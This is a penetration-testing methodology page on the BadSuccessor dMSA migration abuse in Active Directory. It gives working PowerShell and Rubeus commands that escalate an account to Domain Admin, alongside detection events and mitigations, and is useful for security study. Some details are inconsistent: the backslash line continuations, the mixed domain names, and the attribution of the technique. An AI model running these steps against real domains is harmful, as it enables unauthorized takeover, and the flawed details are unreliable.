badsuccessor-dmsa-migration-abuse.md (7100B)
1 --- 2 title: "BadSuccessor: Privilege Escalation via Delegated MSA Migration Abuse" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # BadSuccessor: Privilege Escalation via Delegated MSA Migration Abuse 14 15 ## Overview 16 17 Delegated Managed Service Accounts (**dMSA**) are the next-generation successor of **gMSA** that ship in Windows Server 2025. A legitimate migration workflow allows administrators to replace an *old* account (user, computer or service account) with a dMSA while transparently preserving permissions. The workflow is exposed through PowerShell cmdlets such as `Start-ADServiceAccountMigration` and `Complete-ADServiceAccountMigration` and relies on two LDAP attributes of the **dMSA object**: 18 19 * **`msDS-ManagedAccountPrecededByLink`** – *DN link* to the superseded (old) account. 20 * **`msDS-DelegatedMSAState`** – migration state (`0` = none, `1` = in-progress, `2` = *completed*).<sup>[[1]](#references)</sup> 21 22 If an attacker can create **any** dMSA inside an OU and directly manipulate those 2 attributes, LSASS & the KDC will treat the dMSA as a *successor* of the linked account. When the attacker subsequently authenticates as the dMSA **they inherit all the privileges of the linked account** – up to **Domain Admin** if the Administrator account is linked.<sup>[[1]](#references)</sup> 23 24 This technique was coined **BadSuccessor** by Unit 42 in 2025. Microsoft later assigned it **CVE-2025-53779** and released a security update in **August 2025**. The technique remains relevant to unpatched Windows Server 2025 environments and to reviews of dangerous OU delegation.<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup> 25 26 ### Attack prerequisites 27 28 1. An account that is *allowed* to create objects inside **an Organizational Unit (OU)** *and* has at least one of: 29 * `Create Child` → **`msDS-DelegatedManagedServiceAccount`** object class 30 * `Create Child` → **`All Objects`** (generic create) 31 2. Network connectivity to LDAP & Kerberos (standard domain joined scenario / remote attack).<sup>[[1]](#references)</sup> 32 33 ## Enumerating Vulnerable OUs 34 35 Unit 42 released a PowerShell helper script that parses security descriptors of each OU and highlights the required ACEs:<sup>[[1]](#references)</sup> 36 37 ```powershell 38 Get-BadSuccessorOUPermissions.ps1 -Domain contoso.local 39 ``` 40 41 Under the hood the script runs a paged LDAP search for `(objectClass=organizationalUnit)` and checks every `nTSecurityDescriptor` for 42 43 * `ADS_RIGHT_DS_CREATE_CHILD` (0x0001) 44 * `Active Directory Schema ID: 31ed51fa-77b1-4175-884a-5c6f3f6f34e8` (object class *msDS-DelegatedManagedServiceAccount*) 45 46 ## Exploitation Steps 47 48 Once a writable OU is identified the attack is only 3 LDAP writes away:<sup>[[1]](#references)</sup> 49 50 ```powershell 51 # 1. Create a new delegated MSA inside the delegated OU 52 New-ADServiceAccount -Name attacker_dMSA \ 53 -DNSHostName host.contoso.local \ 54 -Path "OU=DelegatedOU,DC=contoso,DC=com" 55 56 # 2. Point the dMSA to the target account (e.g. Domain Admin) 57 Set-ADServiceAccount attacker_dMSA -Add \ 58 @{msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=contoso,DC=com"} 59 60 # 3. Mark the migration as *completed* 61 Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2} 62 ``` 63 64 After replication the attacker can simply **logon** as `attacker_dMSA$` or request a Kerberos TGT – Windows will build the token of the *superseded* account.<sup>[[1]](#references)</sup> 65 66 ### Automation 67 68 Several public PoCs wrap the entire workflow including password retrieval and ticket management: 69 70 * SharpSuccessor (C#) – [https://github.com/logangoins/SharpSuccessor](https://github.com/logangoins/SharpSuccessor)<sup>[[3]](#references)</sup> 71 * BadSuccessor.ps1 (PowerShell) – [https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1](https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1)<sup>[[4]](#references)</sup> 72 * NetExec module – `badsuccessor` (Python) – [https://github.com/Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec)<sup>[[5]](#references)</sup> 73 74 ### Post-Exploitation 75 76 ```powershell 77 # Request a TGT for the dMSA and inject it (Rubeus) 78 Rubeus asktgt /user:attacker_dMSA$ /password:<ClearTextPwd> /domain:contoso.local 79 Rubeus ptt /ticket:<Base64TGT> 80 81 # Access Domain Admin resources 82 dir \\DC01\C$ 83 ``` 84 85 ## Detection & Hunting 86 87 Enable **Object Auditing** on OUs and monitor for the following Windows Security Events:<sup>[[1]](#references)[[2]](#references)</sup> 88 89 * **5137** – Creation of the **dMSA** object 90 * **5136** – Modification of **`msDS-ManagedAccountPrecededByLink`** 91 * **4662** – Specific attribute changes 92 * GUID `2f5c138a-bd38-4016-88b4-0ec87cbb4919` → `msDS-DelegatedMSAState` 93 * GUID `a0945b2b-57a2-43bd-b327-4d112a4e8bd1` → `msDS-ManagedAccountPrecededByLink` 94 * **2946** – TGT issuance for the dMSA 95 96 Correlating `4662` (attribute modification), `4741` (creation of a computer/service account) and `4624` (subsequent logon) quickly highlights BadSuccessor activity. XDR solutions such as **XSIAM** ship with ready-to-use queries (see references).<sup>[[2]](#references)</sup> 97 98 ## Mitigation 99 100 * Apply Microsoft's security update for **CVE-2025-53779** and verify the patch level of every Windows Server 2025 domain controller.<sup>[[6]](#references)</sup> 101 * Apply the principle of **least privilege** – only delegate *Service Account* management to trusted roles. 102 * Remove `Create Child` / `msDS-DelegatedManagedServiceAccount` from OUs that do not explicitly require it. 103 * Monitor for the event IDs listed above and alert on *non-Tier-0* identities creating or editing dMSAs. 104 105 ## See also 106 107 108 [Golden Dmsa Gmsa](/hacktricks/windows-hardening/active-directory-methodology/golden-dmsa-gmsa) 109 110 ## References 111 112 - [1] [BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory – Akamai](https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory) 113 - [2] [Unit42 – When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts](https://unit42.paloaltonetworks.com/badsuccessor-attack-vector/) 114 - [3] [SharpSuccessor PoC](https://github.com/logangoins/SharpSuccessor) 115 - [4] [BadSuccessor.ps1 – Pentest-Tools-Collection](https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1) 116 - [5] [NetExec BadSuccessor module](https://github.com/Pennyw0rth/NetExec/blob/main/nxc/modules/badsuccessor.py) 117 - [6] [Microsoft Security Response Center – CVE-2025-53779](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53779)